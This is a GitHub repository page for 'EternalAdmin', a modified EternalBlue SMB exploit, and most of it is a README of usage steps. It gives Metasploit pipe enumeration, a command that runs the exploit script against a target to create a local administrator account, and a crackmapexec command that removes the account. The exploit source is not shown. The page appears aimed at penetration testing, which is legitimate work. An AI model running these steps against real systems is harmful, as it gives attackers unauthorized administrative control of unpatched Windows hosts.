Skip to content

Kahvi-0/EternalAdmin

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

Eternal blue exploit tweaked from https://www.exploit-db.com/exploits/42315

  1. Enumerate pipes
msfconsole 
auxiliary/scanner/smb/pipe_auditor
  1. Edit the 4 blank variables at the beginning of the exploit code

  2. Run to a add new local admin account

python2.7 ./EternalAdmin.py [target] [pipe]
  1. Remove created local admin once finished
crackmapexec smb 192.168.4.29  -u 'z'  -p 'x' --local-auth -x "net user /delete z"

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages